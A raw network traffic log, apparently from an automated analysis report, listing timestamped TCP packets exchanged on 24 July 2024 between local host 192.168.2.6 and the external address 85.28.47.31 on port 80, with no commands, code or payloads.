                                                                                        Jul 24, 2024 07:14:18.499293089 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.499310970 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.499320984 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.499344110 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.499358892 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.499376059 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.499393940 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.499408960 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.499414921 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.499440908 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.499454975 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.499476910 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.499490976 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.499525070 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.499754906 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.499787092 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.499805927 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.499820948 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.499834061 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.499854088 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.499866009 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.499886990 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.499901056 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.499919891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.499936104 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.499954939 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.499969006 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.499989033 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.500000954 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.500024080 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.500036001 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.500056028 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.500072002 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.500091076 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.500103951 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.500123024 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.500138044 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.500157118 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.500170946 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.500189066 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.500199080 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.500222921 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.500236988 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.500257015 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.500269890 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.500315905 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.500550985 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.500586033 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.500603914 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.500632048 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.585968971 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586080074 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586133003 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586149931 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.586149931 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.586167097 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586201906 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586216927 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.586216927 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.586236000 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586256027 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.586280107 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.586288929 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586323977 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586345911 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.586358070 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586370945 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.586409092 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.586452007 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586486101 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586504936 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.586539030 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586540937 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.586571932 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586592913 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.586606979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586622000 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.586644888 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586658955 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.586700916 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.586934090 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586966991 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.586986065 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.587001085 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.587016106 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.587034941 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.587054014 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.587069988 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.587095976 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.587102890 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.587112904 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.587136030 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.587156057 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.587169886 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.587192059 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.587204933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.587220907 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.587239027 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.587240934 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.587272882 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.587290049 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.587308884 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.587325096 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.587342978 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.587357998 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.587378025 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.587393045 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.587430000 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.587827921 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.587884903 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.587966919 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588001966 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588028908 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588036060 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588047028 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588069916 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588083982 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588104010 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588123083 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588155985 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588155985 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588190079 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588208914 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588237047 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588243961 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588277102 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588295937 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588313103 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588319063 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588346004 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588363886 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588380098 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588392973 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588416100 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588430882 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588449955 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588464022 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588500023 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588506937 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588541985 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588562012 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588577032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588588953 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588610888 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588628054 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588644028 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588664055 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588679075 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588687897 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588711977 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588727951 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588746071 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588761091 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588778973 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.588800907 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.588825941 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.589591026 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.589649916 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.589718103 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.589751959 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.589773893 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.589786053 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.589796066 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.589837074 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.589838982 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.589870930 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.589888096 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.589904070 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.589916945 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.589937925 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.589956045 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.589972019 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.589986086 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.590010881 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.590024948 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.590045929 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.590060949 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.590080023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.590095997 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.590115070 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.590131998 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.590148926 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.590167046 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.590183020 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.590194941 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.590218067 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.590229988 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.590264082 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.590269089 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.590320110 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.630716085 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.635886908 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.810874939 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.810945034 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.810992002 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811044931 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811084032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811116934 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811120033 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811120987 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811120987 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811120987 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811150074 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811201096 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811201096 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811201096 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811207056 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811242104 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811264038 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811275005 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811286926 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811331034 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811333895 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811363935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811378956 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811398029 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811419010 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811429977 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811465025 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811465979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811486006 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811500072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811507940 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811533928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811543941 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811568022 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811584949 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811603069 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811618090 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811636925 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811655998 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811671019 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811681032 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811703920 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811717033 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811753988 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811757088 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811805010 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811847925 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811881065 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811901093 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811913967 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811925888 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811949015 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811969042 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.811983109 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.811989069 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812017918 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812033892 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812052011 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812069893 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812088966 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812108040 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812123060 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812135935 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812158108 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812172890 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812206030 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812396049 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812429905 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812453032 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812463045 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812491894 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812513113 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812526941 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812560081 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812575102 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812592983 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812613964 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812627077 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812633991 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812659979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812673092 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812695026 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812712908 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812727928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812750101 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812762022 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812772036 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812796116 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.812804937 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812849045 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.812994957 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813028097 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813056946 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813061953 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813076973 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813097000 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813117981 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813136101 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813169003 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813201904 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813225985 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813244104 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813373089 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813388109 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813402891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813417912 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813421965 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813430071 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813433886 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813446999 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813450098 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813466072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813467026 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813477039 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813481092 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813488960 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813497066 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813504934 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813513994 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813517094 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813529968 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813536882 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813546896 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813551903 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813563108 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813565016 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813579082 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.813582897 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813591003 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.813613892 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:18.814685106 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.814701080 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.814716101 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:18.814732075 CEST804971185.28.47.31192.168.2.6
